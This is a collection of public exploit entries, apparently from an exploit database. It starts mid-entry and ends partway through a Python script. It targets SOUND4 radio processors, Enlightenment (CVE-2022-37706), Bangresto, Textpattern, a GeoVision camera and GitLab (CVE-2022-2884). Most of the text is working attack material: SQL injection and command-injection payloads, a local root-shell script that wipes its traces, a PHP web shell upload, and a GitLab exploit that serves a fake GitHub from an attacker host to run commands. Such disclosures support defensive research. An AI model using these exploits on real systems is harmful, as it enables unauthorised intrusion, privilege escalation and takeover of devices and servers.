and an IMPACT Clipper. Desc: The application suffers from an SQL Injection vulnerability. Input passed through the 'password' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5726 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php 26.09.2022 -- POST /index.php HTTP/1.1 username=t00t&password='+joxy--+z

## Exploit Title: Enlightenment v0.25.3 - Privilege escalation ## Author: nu11secur1ty ## Date: 12.26.2022 ## Vendor: https://www.enlightenment.org/ ## Software: https://www.enlightenment.org/download ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706 ## CVE ID: CVE-2022-37706 ## Description: The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation. Enlightenment_sys in Enlightenment before 0.25.3 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring If the attacker has access locally to some machine on which the machine is installed Enlightenment he can use this vulnerability to do very dangerous stuff. ## STATUS: CRITICAL Vulnerability ## Tested on: ```bash DISTRIB_ID=Ubuntu DISTRIB_RELEASE=22.10 DISTRIB_CODENAME=kinetic DISTRIB_DESCRIPTION="Ubuntu 22.10" PRETTY_NAME="Ubuntu 22.10" NAME="Ubuntu" VERSION_ID="22.10" VERSION="22.10 (Kinetic Kudu)" VERSION_CODENAME=kinetic ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=kinetic LOGO=ubuntu-logo ``` [+] Exploit: ```bash #!/usr/bin/bash # Idea by MaherAzzouz # Development by nu11secur1ty echo "CVE-2022-37706" echo "[*] Trying to find the vulnerable SUID file..." echo "[*] This may take few seconds..." # The actual problem file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit" echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Welcome to the rabbit hole :)" ${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net read -p "Press any key to clean the evedence..." echo -e "Please wait... " sleep 5 rm -rf /tmp/exploit rm -rf /tmp/net echo -e "Done; Everything is clear ;)" ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706) ## Proof and Exploit: [href](https://streamable.com/zflbgg) ## Time spent `01:00:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application suffers from an unauthenticated directory traversal file write vulnerability. Input passed through the 'filename' POST parameter called by the 'upgrade.php' script is not properly verified before being used to upload .upgbox Firmware files. This can be exploited to write to arbitrary locations on the system via directory traversal attacks. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5730 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php 26.09.2022 -- POST /cgi-bin/upload.cgi HTTP/1.1 Host: RAAAADIOOO Content-Type: multipart/form-data; boundary=----zzzzz User-Agent: TheViewing/05 Accept-Encoding: gzip, deflate ------zzzzz Content-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned" Content-Type: application/octet-stream t00t ------zzzzz Content-Disposition: form-data; name="submit" Do it ------zzzzz--

# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'password' HTTP POST parameter through index.php and login.php script. ======================================================================== /var/www/login.php: ------------------- 09: if (isset($_POST['username']) && isset($_POST['password'])) { 10: 11: $ret = -1; 12: // remarque: Check Password for broken, only admin/admin as valid user/password 13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret); ======================================================================== Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5738 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php 26.09.2022 -- > curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/g uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The device allows unauthenticated attackers to visit the unprotected /usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factory default configuration. Once a POST request is made, the device will reboot with its default settings allowing the attacker to bypass authentication and take full control of the system. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5742 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php 26.09.2022 -- > curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \ > sleep 120 #login admin:admin

## Exploit Title: Bangresto 1.0 - SQL Injection ## Exploit Author: nu11secur1ty ## Date: 12.16.2022 ## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html ## Demo: https://axcora.my.id/bangrestoapp/start.php ## Software: https://github.com/mesinkasir/bangresto ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto ## Description: The `itemID` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the itemID parameter, and a database error message was returned. The attacker can be stooling all information from the database of this application. ## STATUS: CRITICAL Vulnerability [+] Payload: ```MySQL --- Parameter: itemID (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT (ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1 --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto) ## Proof and Exploit: [href](https://streamable.com/moapnd) ## Time spent `00:30:00` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://textpattern.com/ # Version : 4.8.8 # Tested on: windows 11 xammp | Kali linux # Category: WebApp # Google Dork: intext:"Published with Textpattern CMS" # Date: 10/09/2022 # ######## Description ######## # # Step 1: Login admin account and go settings of site # Step 2: Upload a file to web site and selecet the rce.php # Step3 : Upload your webshell that's it... # ######## Proof of Concept ######## ========>>> START REQUEST <<<========= ############# POST REQUEST (FILE UPLOAD) ############################## (1) POST /textpattern/index.php?event=file HTTP/1.1 Host: localhost Content-Length: 1038 sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/textpattern/index.php?event=file Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin Connection: close ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="fileInputOrder" 1/1 ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="app_mode" async ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="MAX_FILE_SIZE" 2000000 ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="event" file ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="step" file_insert ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="id" ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="_txp_token" 16ea3b64ca6379aee9599586dae73a5d ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="thefile[]"; filename="rce.php" Content-Type: application/octet-stream <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> ------WebKitFormBoundaryMgUEFltFdqBVvdJu-- ############ POST RESPONSE (FILE UPLOAD) ######### (1) HTTP/1.1 200 OK Date: Sat, 10 Sep 2022 15:28:57 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 X-Textpattern-Runtime: 35.38 ms X-Textpattern-Querytime: 9.55 ms X-Textpattern-Queries: 16 X-Textpattern-Memory: 2893 kB Content-Length: 270 Connection: close Content-Type: text/javascript; charset=utf-8 ___________________________________________________________________________________________________________________________________________________ ############ REQUEST TO THE PAYLOAD ############################### (2) GET /files/c.php?cmd=whoami HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: txp_login_public=4353608be0admin Connection: close ############ RESPONSE THE PAYLOAD ############################### (2) HTTP/1.1 200 OK Date: Sat, 10 Sep 2022 15:33:06 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 Content-Length: 29 Connection: close Content-Type: text/html; charset=UTF-8 <pre>alpernae\alperen </pre> ========>>> END REQUEST <<<=========

# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass # Device name: GV-ADR2701 # Date: 26 December , 2020 # Exploit Author: Chan Nyein Wai # Vendor Homepage: https://www.geovision.com.tw/ # Software Link: https://www.geovision.com.tw/download/product/ # Firmware Version: V1.00_2017_12_15 # Tested on: windows 10 # Exploitation 1. Capture The Login Request with burp, Do intercept request to response Request: ``` PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1 Host: 10.10.10.10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA== Content-Length: 46 Origin: http://10.10.10.10 Connection: close Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0 Cookie: isAutoStartVideo=1 {"UserName":"admin","Password":"0X]&0D]]05"} ``` 2. The following is the normal response when you login to the server. ``` HTTP/1.1 200 Ok Content-Length: 170 Content-Type: text/plain Connection: close X-Frame-Options: SAMEORIGIN { "Response": { "ResponseURL": "/LAPI/V1.0/Channel/0/System/Login", "CreatedID": -1, "StatusCode": 460, "StatusString": "PasswdError", "Data": "null" } } ``` By editing the response to the following, you can successfully log in to the web application. ``` HTTP/1.1 200 Ok Content-Length: 170 Content-Type: text/plain Connection: close X-Frame-Options: SAMEORIGIN { "Response": { "ResponseURL": "/LAPI/V1.0/Channel/0/System/Login", "CreatedID": -1, "StatusCode": 0, "StatusString": "Succeed", "Data": "null" } } ```

# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-12-25 # Exploit Author: Antonio Francesco Sardella # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://about.gitlab.com/install/ # Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1 # Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution) # CVE: CVE-2022-2884 # Category: WebApps # Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884 # Credits: yvvdwf (https://hackerone.com/reports/1672388) # This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884. # A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, # 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution # via the Import from GitHub API endpoint. # https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/ # DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments. # Please use this tool responsibly. I do not take responsibility for the way in which any one uses # this application. I am NOT responsible for any damages caused or any crimes committed by using this tool. import argparse import logging import validators import random import string import requests import time import base64 import sys from flask import Flask, current_app, request from multiprocessing import Process VERSION = "v1.0 (2022-12-25)" DEFAULT_LOGGING_LEVEL = logging.INFO app = Flask(__name__) def parse_arguments(): parser = argparse.ArgumentParser( description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}" ) parser.add_argument("-u", "--url", required=True, help="URL of the victim GitLab") parser.add_argument("-pt", "--private-token", required=True, help="private token of GitLab") parser.add_argument("-tn", "--target-namespace", required=False, default="root", help="target namespace of GitLab (default is 'root')") parser.add_argument("-a", "--address", required=True, help="IP address of the attacker machine") parser.add_argument("-p", "--port", required=False, type=int, default=1337, help="TCP port of the attacker machine (default is 1337)") parser.add_argument("-s", "--https", action="store_true", required=False, default=False, help="set if the attacker machine is exposed via HTTPS") parser.add_argument("-c", "--command", required=True, help="the command to execute") parser.add_argument("-d", "--delay", type=float, required=False, help="seconds of delay to wait for the exploit to complete") parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="verbose mode") return parser.parse_args() def validate_input(args): try: validators.url(args.url) except validators.ValidationFailure: raise ValueError("Invalid target URL!") if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"): raise ValueError("Invalid GitLab private token!") if len(args.target_namespace.strip()) < 1: raise ValueError("Invalid GitLab target namespace!") try: validators.ipv4(args.address) except validators.ValidationFailure: raise ValueError("Invalid attacker IP address!") if args.port < 1 or args.port > 65535: raise ValueError("Invalid attacker TCP port!") if len(args.command.strip()) < 1: raise ValueError("Invalid command!") if args.delay is not None and args.delay <= 0.0: raise ValueError("Invalid delay!") def generate_random_string(length): letters = string.ascii_lowercase + string.ascii_uppercase + string.digits return ''.join(random.choice(letters) for i in range(length)) def generate_random_lowercase_string(length): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def generate_random_number(length): letters = string.digits result = "0" while result.startswith("0"): result = ''.join(random.choice(letters) for i in range(length)) return result def base64encode(to_encode): return base64.b64encode(to_encode.encode("ascii")).decode("ascii") def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id): logging.info("Sending request to target GitLab.") protocol = "http" if is_https: protocol += "s" headers = { "Content-Type": "application/json", "PRIVATE-TOKEN": private_token, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" } fake_personal_access_token = "ghp_" + generate_random_string(36) new_name = generate_random_lowercase_string(8) logging.debug("Random generated parameters of the request:") logging.debug(f" fake_repo_id = {fake_repo_id}") logging.debug(f"fake_personal_access_token = {fake_personal_access_token}") logging.debug(f" new_name = {new_name}") payload = { "personal_access_token": fake_personal_access_token, "repo_id": fake_repo_id, "target_namespace": target_namespace, "new_name": new_name, "github_hostname": f"{protocol}://{address}:{port}" } target_endpoint = f"{url}" if not target_endpoint.endswith("/"): target_endpoint = f"{target_endpoint}/" target_endpoint = f"{target_endpoint}api/v4/import/github" try: r = requests.post(target_endpoint, headers=headers, json=payload) logging.debug("Response:") logging.debug(f"status_code = {r.status_code}") logging.debug(f" text = {r.text}") logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).") if r.status_code != 201: logging.fatal("Wrong response received from the target GitLab.") logging.debug(f" text = {r.text}") raise Exception("Wrong response received from the target GitLab.") except: logging.fatal("Error in contacting the target GitLab.") raise Exception("Error in contacting the target GitLab.") def is_server_alive(address, port, is_https): protocol = "http" if is_https: protocol += "s" try: r = requests.get(f"{protocol}://{address}:{port}/") if r.status_code == 200 and "The server is running." in r.text: return True else: return False except: return False def start_fake_github_server(address, port, is_https, command, fake_repo_id): app.config["address"] = address app.config["port"] = port protocol = "http" if is_https: protocol += "s" app.config["attacker_server"] = f"{protocol}://{address}:{port}" app.config["command"] = command app.config["fake_user"] = generate_random_lowercase_string(8) app.config["fake_user_id"] = generate_random_number(8) app.config["fake_repo"] = generate_random_lowercase_string(8) app.config["fake_repo_id"] = fake_repo_id app.config["fake_issue_id"] = generate_random_number(9) app.run("0.0.0.0", port) def encode_command(command): encoded_command = "" for c in command: encoded_command += ("<< " + str(ord(c)) + ".chr ") encoded_command += "<<" logging.debug(f"encoded_command = {encoded_command}") return encoded_command def generate_rce_payload(command): logging.debug("Crafting RCE payload:") logging.debug(f" command = {command}") encoded_command = encode_command(command) # Useful in order to prevent escaping hell... rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\"" logging.debug(f" rce_payload = {rce_payload}") return rce_payload def generate_user_response(attacker_server, fake_user, fake_user_id): response = { "avatar_url": f"{attacker_server}/avatars/{fake_user_id}", "events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}", "followers_url": f"{attacker_server}/users/{fake_user}/followers", "following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}", "gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}", "gravatar_id": "", "html_url": f"{attacker_server}/{fake_user}", "id": int(fake_user_id), "login": f"{fake_user}", "node_id": base64encode(f"04:User{fake_user_id}"), "organizations_url": f"{attacker_server}/users/{fake_user}/orgs", "received_events_url": f"{attacker_server}/users/{fake_user}/received_events", "repos_url": f"{attacker_server}/users/{fake_user}/repos", "site_admin": False, "starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}", "subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions", "type": "User", "url": f"{attacker_server}/users/{fake_user}" } return response def generate_user_full_response(attacker_server, fake_user, fake_user_id): partial = generate_user_response(attacker_server, fake_user, fake_user_id) others = { "bio": None, "blog": "", "company": None, "created_at": "2020-08-21T14:35:46Z", "email": None, "followers": 2, "following": 0, "hireable": None, "location": None, "name": None, "public_gists": 0, "public_repos": 0, "twitter_username": None, "updated_at": "2022-08-08T12:11:40Z", } response = {**partial, **others} return response def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id): response = { "allow_auto_merge": False, "allow_forking": True, "allow_merge_commit": True, "allow_rebase_merge": True, "allow_squash_merge": True, "allow_update_branch": False, "archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}", "archived": False, "assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}", "blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}", "branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}", "clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git", "collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}", "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}", "commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}", "compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}", "contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}", "contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors", "created_at": "2021-04-09T13:55:55Z", "default_branch": "main", "delete_branch_on_merge": False, "deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments", "description": None, "disabled": False, "downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads", "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events", "fork": False, "forks": 1, "forks_count": 1, "forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks", "full_name": f"{fake_user}/{fake_repo}", "git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}", "git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}", "git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}", "git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git", "has_downloads": True, "has_issues": True, "has_pages": False, "has_projects": True, "has_wiki": True, "homepage": None, "hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks", "html_url": f"{attacker_server}/{fake_user}/{fake_repo}", "id": int(repo_id), "is_template": False, "issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}", "issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}", "issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}", "keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}", "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}", "language": "Python", "languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages", "license": None, "merge_commit_message": "Message", "merge_commit_title": "Title", "merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges", "milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}", "mirror_url": None, "name": f"{fake_repo}", "network_count": 1, "node_id": base64encode(f"010:Repository{repo_id}"), "notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}", "open_issues": 4, "open_issues_count": 4, "owner": generate_user_response(attacker_server, fake_user, fake_user_id), "permissions": { "admin": True, "maintain": True, "pull": True, "push": True, "triage": True }, "private": True, "pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}", "pushed_at": "2022-08-14T15:36:21Z", "releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}", "size": 3802, "squash_merge_commit_message": "Message", "squash_merge_commit_title": "Title", "ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git", "stargazers_count": 0, "stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers", "statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}", "subscribers_count": 1, "subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers", "subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription", "svn_url": f"{attacker_server}/{fake_user}/{fake_repo}", "tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags", "teams_url": 